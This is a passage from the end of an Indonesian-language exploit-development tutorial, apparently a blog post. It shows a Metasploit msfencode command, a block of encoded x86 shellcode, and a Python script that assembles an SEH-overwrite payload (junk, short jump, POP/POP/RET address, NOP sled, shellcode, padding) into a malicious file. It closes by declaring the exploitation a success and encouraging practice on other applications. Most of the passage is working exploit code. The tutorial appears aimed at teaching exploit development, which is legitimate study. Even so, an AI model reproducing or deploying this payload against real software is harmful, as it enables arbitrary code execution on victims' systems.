# msfencode -a x86 -b "\x00\x0a\x0d\x25\x68\x08\x20" -t c
# x86/call4_dword_xor succeeded with size 220 (iteration=1)
shellcode = ("\x2b\xc9\x83\xe9\xcf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\xeb\x9c\x9e\xf1\x83\xee\xfc\xe2\xf4\x17\x74\x17\xf1\xeb\x9c"
"\xfe\x78\x0e\xad\x4c\x95\x60\xce\xae\x7a\xb9\x90\x15\xa3\xff"
"\x17\xec\xd9\xe4\x2b\xd4\xd7\xda\x63\xaf\x31\x47\xa0\xff\x8d"
"\xe9\xb0\xbe\x30\x24\x91\x9f\x36\x09\x6c\xcc\xa6\x60\xce\x8e"
"\x7a\xa9\xa0\x9f\x21\x60\xdc\xe6\x74\x2b\xe8\xd4\xf0\x3b\xcc"
"\x15\xb9\xf3\x17\xc6\xd1\xea\x4f\x7d\xcd\xa2\x17\xaa\x7a\xea"
"\x4a\xaf\x0e\xda\x5c\x32\x30\x24\x91\x9f\x36\xd3\x7c\xeb\x05"
"\xe8\xe1\x66\xca\x96\xb8\xeb\x13\xb3\x17\xc6\xd5\xea\x4f\xf8"
"\x7a\xe7\xd7\x15\xa9\xf7\x9d\x4d\x7a\xef\x17\x9f\x21\x62\xd8"
"\xba\xd5\xb0\xc7\xff\xa8\xb1\xcd\x61\x11\xb3\xc3\xc4\x7a\xf9"
"\x77\x18\xac\x81\x9d\x13\x74\x52\x9c\x9e\xf1\xbb\xf4\xaf\x7a"
"\x84\x1b\x61\x24\x50\x6c\x2b\x53\xbd\xf4\x38\x64\x56\x01\x61"
"\x24\xd7\x9a\xe2\xfb\x6b\x67\x7e\x84\xee\x27\xd9\xe2\x99\xf3"
"\xf4\xf1\xb8\x63\x4b\x92\x8a\xf0\xfd\xf1")

junk = 'A' * 4
nseh = '\xeb\x08\x90\x90'
seh = '\xD2\xD3\x94\x73'
nops = '\x90' * 16
sisa = 'D' * (20000 - len(junk+nseh+seh+nops+shellcode))

payload = header+junk+nseh+seh+nops+shellcode+sisa

f = open(file,'w')
print "Payload size: ", len(payload)
f.write(payload)
print "File",file, "successfully created"
f.close()

Dan hasilnya:

Eksploitasi berbasis SEH berhasil kita lakukan. Akan tidak mudah memahaminya dalam satu kali putaran (jika ada yang bisa, saya salut dengan Anda karena saya sendiri perlu 2-3 kali percobaan baru paham :D), dan percobaan ini bisa menjadi dasar latihan untuk aplikasi yang lain, biar semakin mahir dan terasah.

Akhir kata, selamat mencoba 🙂

Referensi